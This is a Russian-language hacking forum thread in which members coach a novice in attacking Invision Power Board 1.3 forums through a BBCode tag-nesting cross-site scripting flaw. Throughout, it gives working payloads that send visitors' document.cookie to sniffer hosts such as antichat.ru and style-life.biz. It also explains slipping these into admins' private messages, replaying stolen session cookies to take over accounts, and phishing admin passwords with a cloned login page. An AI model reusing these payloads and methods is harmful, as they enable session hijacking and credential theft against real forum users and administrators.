Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003

Вот пробовал получить хэш,а ни хрена
пользовался:
` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) также пробовал через Видео,но на логе не появляется информация.Почему,в чём я ошибся?

З.Ы.я понимаю что такие вопросы вас задолбали,но в поиске я нихрена не нашёл=(

Вообщето это мой код, =) в конце K: =)

У тебя должен быть IЕ и у них тоже.
Или код измени только Алгол знает как.

тоесть вот так?` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie)
Что значит у них тоже?Это у кого?

З.Ы.я не знаю чей это код,просто ходил по форуму и скопировал,я в этом слабо понимаю

Нет, у тебя какой браузер? Интернет эксплорер?
Если нет, то не будит работать.

у меня есть Опера,Фокс и Эксплор.Надо через эксплор?

да.








Или код менять.

Алгол знает как.

ща попробовал через эксплор...А если я выхожу и вхожу со своего компа в снифере это должно отобразиться?Чё то не показыватся

Непонил.

ну смотри,я отправляю через эксплорер сообщение в форум `style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?Ie:"+document.cookie)
после этого по идее(как я понял)все входу пользователей должны фиксироваться тем,что на сниффер приходит инфа о кукизах итп.Значит если я выхожу из своего логина на форуме,а потом захожу обратно,инфа о моих пирожках тоже должна появится.Так?
З.Ы.просто я не совсем догоняю весь этот процесс поэтому я могу что нить неправильно сказать(первый раз всё-таки)

Ну они должны посмотреть на страницу с снифером. И мой код используй.

что то не выходит=(
а если для маскировочки я напишу так:
1)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
2)круто` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
это будет работать?Или (1) или (2)?

З.Ы.мне зайти на...?

нет не тебе. Util.

1-й работает.
Ты что то не правильно делаешь.

На снифер

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)

На алёрт.

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert())

Фонт менять у меня не получается как вот тут и не кто помогать кроме UTIL не хочит. Все здохли чтоли?

http://antichat.ru/txt/IPB/index1.php

а как понять на алерт?Что это даёт?

Это ты сам должен посмотреть. Трудно тебе объяснить.

Вот иди ко мне там пробуй и тесты проводи.

http://www.whitejordan.ipbfree.com/

Я White Jordan.

Мне тут просто баннули ник.

похоже заработало частично,по крайней мере мой ИП и куки отображаются на сниффере, но нету реферера.Придётся завтра с утра пораньше отлавливать модеров=).Или что то опять неправильно?
А что попробовать?Алерт тебе запостить?

да нет вродебы правельно.

А вдруг у них не Интернет Эксплорер?

а чё если у них не Эксплорер то сё накрылось?=(

Не, если у них ИЭ то БУДИТ работать, а если нет, то код будит видным и тебя поймают и 3 кода лишенния свободы.....................

да то что код виден хер с ним.Главное чтобы куки отправились на снифф.Куки придут?

А если я после кода пропишу что нить то он будет работать?

Становиться ещё интереснее!!!:)Хотел щас дописать приписку" http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie) если у вас не отображается картинка,зайдите через Internet Explorer"(для очень доверчивых),а мне выдают:"незя использовать такой тег".Это по идее заплатка.Но почему она меня пропустила первый раз?

Потому что первый раз уже вписалось.

Поэтому иди на чистое место.

И когда код виден он соровно работает не бойся.

Тут не код проблема а теги.

понятно,ну этот код тока для эксплорера пашет=(И что хуже,там нету реферера,приходиться сидеть и ждать

а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает

а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает

Нужно обязательно ставить фильтр либо на реферер, либо на Query.

а почему не пашет рассылка всех данных снифера?Написано:оставить рефер пустой и пришлют все данные.А пустым он не принимает


EDIT: Ошибка, прошу прошение. Когда код виден, то он работать НЕ будит.

Только что проверил.

Ищи другие теги так как проблема почему виден код в том, что ИЭ и Firefox по разному обрабатывают тег "IMG".

И ещё. Ты просто не знаешь что такое что.

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
Вот это код. "К:" это QUERY. REFERER это адрес страничьки где находится сам код.
Вот образец REFERER:
http://www.izvestia.ru/forum/topic.cgi?forum=8&topic=9663&start=0

Когда имеешь кукииз и у тебя нет пароля, то на любых версиях можно зделать следуещие.

Используй javascript:void(document.cookie)

Код:

javascript:void(document.cookie="pass_hash=XXXXXX"); javascript:void(document.cookie="session_id=XXXXXX"); javascript:void(document.cookie="user_id=XXXXXX")

Это ты должен всё в URL поставить и самое главное не забудь, ты должен быть в входе под другим именем. Тоесть ты должен быть "Logged in". Потом вводишь это и нажимаешь GO а потом Refresh.

И самое главное знай что чтобы это у тебя получилось, твоя жертва тоже должна быть "Logged in". Если у тебя жертва "Logged out" то по МОИМ тестам нечиго не получится. Хотя если Я не прав поправте.

А с прогой Inetcrack тесты Я пока не делал так что не знаю, может не получится если жертва не "Logged in" ?

Алгол Я не разу не мог поменять фонт или попугать людей как ты вот тут. http://antichat.ru/txt/IPB/index1.php
Если можешь, то помоги пожалуйста.

Вот мой код который Я вставляю. Я его изменил на калар тег, но может быть проблема не в теги а в фильтре? Что конкретно что за проблема не понимаю.

Вот Я написал собственный код изменив тег "VIDEO" на "COLOR"

http://aaaaa/=`aaajpg[/IMG]]` style=background:url(javascript:document.body.inne rHTML="http://antichat.ru/h.gif")

Работает но как то не так и только когда PM кому то посылаю. А может быть адрес картинки поменять?
А когда пост делаю вообще не работает может быть потому что фильтор стоит но какой?

чё туда надо вставлять адрес?Типа так?
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?K:http://www.****.com/forum/index.php?showtopic=4"+document.cookie)
Раз на Фоксе не пойдёт,мож кто нить другой код подскажет?Какой нить универсальный что ли?
По поводу хэша:не проще его расшивровать?Тогда никого ждать не надо

Чего????

Ты меня совсем запутал. Что встовлять Я помой му уже очень хорошо расказал.

Ещё раз всё прочти или правильно задай вопрос Я не понил что ты спросил.

Распутываю:существует ли какой либо код,но универсальный для большинства браузеров?Если да,то где взять?

Napisat' svoiu.

Вложенные теги сработают только в IE
а [videо] везде вроде

вообщем давайте так:есть форум http://www.qwerty.com/forum/
можете мне написать код,чтобы он работал в большинстве браузеров,или хотя бы только для ИЕ,но чтобы реферер работал,пажаласта,очень надо

ЛюДИ!Есть кто живой?Ответте пажаласта

frtd -псих
сам с собой разговариват =)

frtd -псих
сам с собой разговариват =)
Бывает)

просто никто не отвечает

Frdt не псих

Почему?

А какую дыру использовать на Powered by Invision Power Board(U) v1.3.1 Final © 2003 IPS, Inc.???

1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :)
Покрайней мере у меня работало =)
P.S. Это для MyIE и IE

(-=util=-)
1)а свой сниффер я как намучу?
2)а универсальных фишек нет,для большенства браузеров?Мне говорили,что видео идёт на всех,но у меня не выходило,напишите пажаласта полный код(например для форума www.vasyapup.com/forum)

сейчас опубликую исходник снифера (готовый) в разделе

Delphi, С/С++, C#, JavaScript

Увидел,скачал.И у меня есть вопросы:
1)Если я его на народ загружу он пахать будет?
2)не грузится файл .htaccess.Он должен грузиться?
3)зачем тама ссыла"СНИФЕР (картинка)".Нажимаешь,а картинку невозможно открыть...
4)код красного цвета для IPB для всех версий?
5)зачем 2.jpg?
я мало в этом понимаю поэтому много вопросов...

http://forum.antichat.ru/showthread.php?p=31012 Пояснил
Все твои ошибки из-за того что народ неподходит.

пишу я в форуме 1.3.1, как указано в доке к сниферу -=util=-:
http://000.aa/=`image.jpg[/img]]` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie)
не проканывает, в форуме отображается как:
'>` style=background:url(javascript:document.images[12].src="http://style-life.biz/onelinetoolz/sn/me.jpg?"+document.cookie)

1. Работает в IE и в большенстве форумов 100% работает в плоть до версий 2.0.Х.
2. Если только админы не гении и сами незакрыли дыру. Незнаю патч есть или нет.
3. Попробуй в др. форумах. Попробуй images[12]. заменить на images[0]. Попробуй [color= заменить на [video=
и т.д........

(-=util=-)
вощем мне не светит свой снифф поиметь:)

мля меня ташнит. =(

1. делаешь свой снифер (чтобы без всяких подписок) Используешь баг с спаренными тэгами (т.е. пихаешь админу в ПМ снифер). И ждёшь когда прилетят к тебе куки. Потом редактируешь свои.
2. (если куки непришли) Спомощью тех же тэгов делаешь пересылку на свою страницу в ПМ админу. А на своей странице точная копия того форума (одна страница ошибки авторизации) Но в теле этой страницы ввод пароля и логина придёт к тебе на ящик. :)
Покрайней мере у меня работало =)
P.S. Это для MyIE и IE
Ну этого не достаточно. Еще бы надо, что бы админ был ламер. А то поймет и пасс поменяет :)

(-=util=-)
вощем мне не светит свой снифф поиметь:)
А на этот счет я всегда так говорю: прежде чем что-то ломать, выучи необходимый минимум (хотя бы поверхностно): HTML, CSS, JavaScript, PHP, MySQL, можно Perl (не обязательно, признаю, я его сам не сильно знаю).
А то только видео и подавай, что бы показать, куда нажать и сразу пасс получить.

P.S. (оффтоп, простите). Случай: одим ламхакер хотел phpbb2 ломануть. Так вот он по видео с этого сайта и пробует. Прикол в том, что на том форуме первый пользователь не был админом (ну так получилось). Так он и голову ломал потом, почему ссылки нет на панель админа. Т.е. мозги вообще не шевелятся, не понимая даже почему тот метод взлома работает пытается его использовать по стандартному шаболону, а тут тебе рас и не шаблонная ситуация и крутой хакер превращается в судрожно бьющуюся рыбу на берегу (т.е. ламера)

я ламер,но не думаю что до такого(надеюсь=))